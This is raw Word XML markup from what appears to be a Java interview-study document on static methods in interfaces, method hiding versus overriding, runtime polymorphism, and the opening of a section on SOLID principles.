    <w:p w14:paraId="090191D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4471D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040AA" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384D816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1069A5A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implement instance methods from Animal, but static methods are not inherited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005E1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AB8451" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFFEEF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77E736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91D5CA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lling static method of the interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76785BA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describe(); // Output: Animals are living organisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02608ED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06C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F2DCD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4DCA4C">
          <v:rect id="_x0000_i1386" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FD476"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1356AC54"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nimal interface, there is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> called describe().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1DD6EC"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method is called using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interface name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Animal.describe()), not by creating an instance of the interface or its implementing class (Dog).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB15B8"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interfaces can only be invoked using the interface name itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D0298"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56BAA6">
          <v:rect id="_x0000_i1387" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16295764"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tic Methods in Interfaces?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0A4675"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tility Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods can be used for utility or helper methods that are related to the interface but do not depend on any instance of the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643DDA02"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It allows grouping related static functionality inside the interface, even though interfaces don't usually contain concrete methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E160F5"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1A7">
          <v:rect id="_x0000_i1388" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="685175D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823777A"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inherited by implementing classes. You cannot override or access a static method through an instance of a class implementing the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB5525"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can be overridden, but static methods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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE2D67" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95"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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="012E406A"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8" w:name="_Toc197867342"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we override the static method?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="5EFC6C9D" w14:textId="3E68D69D" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094"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atic methods cannot be overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java. Static methods are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class-level methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and they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an't Static Methods Be Overridden?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F6F7D"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Belong to the Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static methods are tied to the class itself, not to instances of the class. When you call a static method, it is associated with the class, not with the object of that class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56750612"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solution at Compile-Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Static methods are resolv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based on the class type. The JVM doesn't use the runtime type of the object to resolve static methods, which means the method cannot be dynamically dispatched like instance methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276BD73"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of Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Static methods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not overridden) in the subclass. A subclass can define a static method with the same signature as the parent class, but this i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 The method in the subclass does not override the method in the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004EC79D"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BC0B51">
          <v:rect id="_x0000_i1390" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="694C758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Hiding (Not Overriding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35467F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A20B6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parent class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9C5B2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4C613D2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49731F0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7991E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2DE2BC5" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104205E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4FE920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child class (hides the parent static method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D91719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0FBFC7E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4B64FA81"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EAFDE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1C6FDA" w14:textId="77777777" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="005D5094" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFBB05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4A8277C"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FFA25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static methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67043C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Animal.sound();  // Output: Animal makes a sound.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2892B4C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Dog barks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2CFBF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CA56B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s are resolved at compile-time, based on the reference type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6DA89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animal = new Dog();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E950D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sound();  // Output: Animal makes a sound. (Not Dog barks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D02E5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8E835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151823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E2BA2"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ound() method in the Animal class is static, and Dog also defines a static sound() method, which </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the parent class method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DCDF29"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the animal reference is pointing to a Dog object, the method called is based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reference type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Animal), not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Dog).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A04A8"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ehavior is known a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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314175E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755D738"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732E5C2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54932C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2D21D18E"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0B0974">
          <v:rect id="_x0000_i1391" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570F960"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Takeaways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B819C"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Only </w:t>
      </w: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xml:space="preserve"> (non-static methods) can be overridden in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C481E2D"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ding Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If a subclass defines a static method with the same signature as the parent class, it is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not overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BAA2C1"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Static methods are resolved at compile-time based on the class type, not the runtime type of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35185E93" w14:textId="67186660"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8B9B317">
          <v:rect id="_x0000_i1392" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9D8200"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9" w:name="_Toc197867343"/>
      <w:r w:rsidRPr="00CE4B95">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853874D" w14:textId="34C35898" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266A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cenario: Class A and Class B with m1() Method, and Class B Extends Class A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377A89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assume you have two classe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extend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Both classes contain a method m1(). In this scenario, which method will be called depends on the object you're calling it on and whether m1()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Class B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F3858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reakdown of how it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03566B5B"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m1() is Overridden in Class B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256137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override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then the method of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the actual object type) will be called, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not the reference type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the declared class type). 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D94975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7EA7D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5DF8D42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2DEF536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515F669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EF965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670ECD" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71AF92B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779CFBFA"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BA35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0E358A9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B: m1()");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712516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C94C4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814A84" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00147F4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D645C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3114D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3BF8A809"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4D5342E7" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3A656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bj1.m1();  // Calls m1() from Class A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7150A67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B (because of runtime polymorphism)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0FD83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E752F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656C32"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49E0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 is an instance of A, so calling obj1.m1() call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695FF62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 is a reference of type A, but it points to an object of type B. Therefore, calling obj2.m1() calls the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because the actual object type is B and the method is overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173B83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F6F2C0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16FA34F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m1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF7301"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C49AC">
          <v:rect id="_x0000_i1393" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B9D7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m1() is Not Overridden in Class B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54CF98"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 not override the m1() method, then the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will be called, even if the object is of type B, because the method is inherite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39ACF39A"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0A3EA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131343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6515FD4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17A1A64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552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EAEEBD" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D5944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21A5B2B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 override of m1() in Class B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC70C2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29E193" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BFA13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2997D0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55E1D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6692566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1708E44A" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95" w:rsidRDefault="000A7726" w:rsidP="004266AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2AB9E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m1();  // Calls m1() from Class A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412BD1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A (because Class B doesn't override it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491106D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17E0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8C339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1A44DBF"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m1()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as obj1 is an instance of A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27477812"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m1() also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even though the reference is of type A but the object is of type B. This is becaus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n't override m1(), so the method from the parent class A is inherited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD622A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FC51E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ADE36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9E264B4"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E31D9C">
          <v:rect id="_x0000_i1394" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E194C"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hich Method Gets Called:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D2C2A"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overridden in Class B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73F988"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i.e., the runtime type) will be called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38D209"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f obj2 is of type A but refers to an object of type B, th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ill be called, even though the reference is of type A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE9862"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not overridden in Class B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88BDC5"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Class A) will be called, because the method is inherited by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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5040F" w14:textId="77777777" w:rsidR="000A7726" w:rsidRPr="00CE4B95"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C998B" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95" w:rsidRDefault="003F20E5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc197867344"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain SOLID Principles?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w14:paraId="7AAB28F5" w14:textId="77777777" w:rsidR="003F20E5" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="003F20E5" w:rsidP="003F20E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SOLID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> principles are the five key design principles in object-oriented programming (OOP) that help create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>clean, maintainable, and scalable software</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here’s a breakdown with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>simple explanations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Java examples</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="411F98C9">
          <v:rect id="_x0000_i1396" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="615B5008"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S – Single Responsibility Principle (SRP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A34A7"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A class should have only one reason to change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136293C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47CD14F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A9F40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02FE5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E434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D1782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FBF48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8E15A0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84891B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030C0AE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Sav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00A1FF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F78685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94707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Now </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles only data, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ReportSaver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> handles saving — </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>separation of concerns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
